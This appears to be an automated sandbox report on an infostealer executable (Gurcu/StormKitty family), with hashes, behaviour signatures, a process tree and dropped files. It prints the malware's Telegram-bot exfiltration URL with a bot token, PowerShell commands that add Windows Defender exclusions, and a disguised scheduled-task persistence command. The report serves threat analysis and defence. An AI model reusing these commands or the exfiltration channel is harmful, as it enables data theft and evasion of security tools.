Analysis

  • max time kernel: 150s
  • max time network: 150s
  • platform: windows10-2004_x64
  • resource: win10v2004-20240802-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 19-08-2024 09:39

General

  • Target: 150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe
  • Size: 227KB
  • MD5: 1a83a244d9e90a4865aac14bc0e27052
  • SHA1: d2b65e7aed7657c9915f90f03d46902087479753
  • SHA256: 150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712
  • SHA512: f4b9d26d8a0841f9425abf038f85563ddee65e2404bc508fd23c8023bb565fd7f0ceaeaadde49c4951d3bbbb93f6b64b3cf610464855a2bf2d418477dd4fe03f
  • SSDEEP: 6144:YzJS6VlWn4bk0+GIKSppY6sdeZywNeGC4xIAY9F:YzdVlHbk0X5SpppMVwfI

Malware Config

Extracted

  • Family: gurcu
  • C2:

https://api.telegram.org/bot7375773294:AAFZUnpXCxGuVizu2hOj5WMYl9ULnbeqZ6c/sendDocument?chat_id=5947406001&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2008/19/2024%209:39%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20Admin%0A%F0%9F%86%94%20PC%20=%3E%20KZYBFHMK%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20Kingdom]%0A%F0%9F%94%8D%20IP%20=%3E%20194.110.13.70%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0A%F0%9F%94%93%20Antivirus%20=%3E%20Not%20installed%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2012%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%200%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%2

Signatures

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, the web browser credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Event Triggered Execution: AppInit DLLs 1 TTPs

    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies, and history.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 6 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 20 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe
    "C:\Users\Admin\AppData\Local\Temp\150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:5004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Client.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1064
    • C:\Users\Admin\AppData\Local\Temp\Client.exe
      "C:\Users\Admin\AppData\Local\Temp\Client.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Executes dropped EXE
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:728
      • C:\Windows\SYSTEM32\CMD.exe
        "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3300
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:5040
    • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
      "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
      2⤵
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3976
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\zzzz.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:724
    • C:\Users\Admin\AppData\Local\Temp\zzzz.exe
      "C:\Users\Admin\AppData\Local\Temp\zzzz.exe"
      2⤵
      • Executes dropped EXE
      • Accesses Microsoft Outlook profiles
      • Drops desktop.ini file(s)
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:4440
  • C:\Windows\system32\wbem\WmiApSrv.exe
    C:\Windows\system32\wbem\WmiApSrv.exe
    1⤵
    • Loads dropped DLL
    PID:4232

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\KZYBFHMK\Browsers\Firefox\Bookmarks.txt
    Filesize: 105B
    MD5: 2e9d094dda5cdc3ce6519f75943a4ff4
    SHA1: 5d989b4ac8b699781681fe75ed9ef98191a5096c
    SHA256: c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
    SHA512: d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

  • C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Desktop\DebugBlock.docx
    Filesize: 373KB
    MD5: ed97a78f0ead25192a8011302559a74b
    SHA1: 0ce861baa37020eb363540d074aefbed9af05288
    SHA256: ac4e5f944abb053ae70c39eaf7bc61303d222b092adbd375aadf29c6197f32bd
    SHA512: 7a2c82c50c086cc239501bd642efe7f09f2f68d01650dbf0d2f73084a19d52dc6b45db727d77a7d51cdf0233621b74b432bf473588c13890d974cc038a8fd153

  • C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Desktop\InstallImport.png
    Filesize: 359KB
    MD5: c720dc81392375b8fbb3b336ab4a0948
    SHA1: 1fa05cfb645f718488f3313d1af9cd3975da42e2
    SHA256: 5399a3f87d18afd7d109006b4f86726cd13b28f6f93d21b67df4a72faa2b3244
    SHA512: ffaa320543e6b033fb3c89de4c086087a3cc9dad6e823dd0ae13b8130165a4e5b84b297a384ba2a0aeb1f999c6d92afe87786c98cc38f7b1429b51f18692cd79

  • C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Desktop\LockDeny.css
    Filesize: 517KB
    MD5: f24a56dbaaf7c2f2e0cd1fc24f8f326d
    SHA1: c61eb70395563bcab4ad5a46d240b0179011d575
    SHA256: 4edf21e65c84f08b1b6fb2b8b472d4bd62b6dc983bfc539ea98a033f9494cacd
    SHA512: 44c8fe3b7cded5f3afa64ca06779b517989d73c198f362535a2ba857b824b93252e3f85a63de0a6a0968e749fc2faa35fa6513ea0350dae06b473aaa4f4828fb

  • C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Documents\RemovePing.rtf
    Filesize: 2.3MB
    MD5: 087da719c2ed128148c0fdaed9190dc2
    SHA1: 96f5421fce586eed6336276fe05354733e1cc611
    SHA256: fb461a8625030ef1e282b35dd8d2fa6756e032b5d50a1f7bbef472d2745e2a0d
    SHA512: c13161edf975fc97817154911e6932f4856e59534bbd1010b199266bc6cb86f58ad94536554c8f50fd6ad27be2d70842dd06dac918bd26a8abb56dd9e6bdf343

  • C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Downloads\ApproveSync.svg
    Filesize: 1.0MB
    MD5: 0dc5d5efdd79e85ce873cc5bc6f6cb0d
    SHA1: ccd40f8368f4c19aabf2ce909e997d7a0e81d61d
    SHA256: a2c413affae741fe84990933c26f33f792c9434d91950ff47643e562535be553
    SHA512: 8850bc0644b7275b29201871014e52079e0638ff7690b9e14515b9c35e0c1dd0795edb96124e202df84edf0c28728208d5031c82a10a587e8cd0491d80e6bb20

  • C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Downloads\GetPing.bmp
    Filesize: 1.0MB
    MD5: 6d7f30fdad117f5239c32140474d805b
    SHA1: 16c6bf6ca540dcbe73484b79272a289089b3f00b
    SHA256: 6257859fc7f77a8bf03695a040776f64fd838a7f9d440cf2d43012621c11605f
    SHA512: fade2614ef12a1654882f57331652b3dede2d7e2275a17b5c0090768c960ad642c5790ec6d3df57b975bb89f502f6de407d680e23f571f58184ee1216a2e97f6

  • C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Pictures\TraceRename.jpg
    Filesize: 1.1MB
    MD5: 905257abdd5116e5c24fc25ec0f8c855
    SHA1: e21cd68b51d15df569484dab4dd369d090f21d1f
    SHA256: eea9b1e6d2a7aade51d1e4cd745503d658e2499efdc33411289d6d1fef35d3e3
    SHA512: 93b8089badadd81bdb43c89788116dbf542b4763fa9ef00da639a63a583c399c32fb782a1b718f23ec5d991d083de5767f0f2b73f0ec52ca023e9dd69a60391d

  • C:\Users\Admin\AppData\Local\KZYBFHMK\Process.txt
    Filesize: 4KB
    MD5: 8d30b357860b60f533b4e618f18bd7df
    SHA1: e594542d4396f57342ff93c5356a0c02e9fbd02c
    SHA256: cf153bb0400adc75cb36e38004030e2f6e757c583d913602b35ebf00c9519659
    SHA512: 5c54da67739d2c96d99ce4f38d418150781b9b359933142b61684de3b2868f9e83084d7e7e316a4ff77d1752b0c34412ae100841234dee5f0b1e49ee165cef77

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 2KB
    MD5: d85ba6ff808d9e5444a4b369f5bc2730
    SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
    SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
    SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 944B
    MD5: 77d622bb1a5b250869a3238b9bc1402b
    SHA1: d47f4003c2554b9dfc4c16f22460b331886b191b
    SHA256: f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
    SHA512: d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    Filesize: 100KB
    MD5: 21560cb75b809cf46626556cd5fbe3ab
    SHA1: f2eec01d42a301c3caacd41cddb0ef2284dbb5a6
    SHA256: d2525bab5cb322933c8978880975e0c189feece68ae3f1951bf46297c7f640fa
    SHA512: 21eac0037b16f968ee8743b52dc73efdd34d24c2502d090b399a552dc6cb75f7d3090c10d448c66b868b1c4a7c46a5068b084b88b487e40b1e755356cb7557db

  • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
    Filesize: 22KB
    MD5: 4c8f3a1e15f370ca8afe2992902a6e98
    SHA1: dc6324d924ac31bea4ad7e4dd6720ecdad3877dd
    SHA256: dcdc72549f7ad41cc860738adbeee5e44f02222415fd84ed5c92538ac9049b92
    SHA512: b63c4e48f3024edcf1e1391b5df6ff65fc5111849eb093b429fa0f21c03339dbaeff835f18e250758498f3432874b85348530e47b2ada93f6f68615a5ccf66c0

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_00wzxmkk.oc5.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\zzzz.exe
    Filesize: 320KB
    MD5: de4824c195cf1b2bb498511ef461e49b
    SHA1: f15ca6d0e02c785cce091dbd716cd43e3f5a80bd
    SHA256: 51813dfedbe02f03d08b4728187eadb4948d8be40c9d8fe6e4e1cb61fa7ae209
    SHA512: b211a636f2799d90ce38348dbbc7dbc69ac5374129c7896a137f03a57fe78139a030c1edb90cfc4203799d77a8720df431da75986aa1d8b16274030ad1db770a

  • C:\Windows\xdwd.dll
    Filesize: 136KB
    MD5: 16e5a492c9c6ae34c59683be9c51fa31
    SHA1: 97031b41f5c56f371c28ae0d62a2df7d585adaba
    SHA256: 35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
    SHA512: 20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

  • memory/728-36-0x0000000000AA0000-0x0000000000AC0000-memory.dmp
    Filesize: 128KB

  • memory/1064-14-0x00007FFFE4CD0000-0x00007FFFE5791000-memory.dmp
    Filesize: 10.8MB

  • memory/1064-17-0x00007FFFE4CD0000-0x00007FFFE5791000-memory.dmp
    Filesize: 10.8MB

  • memory/1064-13-0x00007FFFE4CD0000-0x00007FFFE5791000-memory.dmp
    Filesize: 10.8MB

  • memory/1064-12-0x00007FFFE4CD0000-0x00007FFFE5791000-memory.dmp
    Filesize: 10.8MB

  • memory/1064-11-0x00000139D7F70000-0x00000139D7F92000-memory.dmp
    Filesize: 136KB

  • memory/4440-92-0x0000000006FF0000-0x0000000007594000-memory.dmp
    Filesize: 5.6MB

  • memory/4440-100-0x0000000006EC0000-0x0000000006F26000-memory.dmp
    Filesize: 408KB

  • memory/4440-91-0x00000000069A0000-0x0000000006A32000-memory.dmp
    Filesize: 584KB

  • memory/4440-64-0x0000000000C50000-0x0000000000CA6000-memory.dmp
    Filesize: 344KB

  • memory/5004-0-0x00007FFFE4CD3000-0x00007FFFE4CD5000-memory.dmp
    Filesize: 8KB

  • memory/5004-37-0x00007FFFE4CD0000-0x00007FFFE5791000-memory.dmp
    Filesize: 10.8MB

  • memory/5004-63-0x00007FFFE4CD0000-0x00007FFFE5791000-memory.dmp
    Filesize: 10.8MB

  • memory/5004-1-0x00000000000A0000-0x00000000000E0000-memory.dmp
    Filesize: 256KB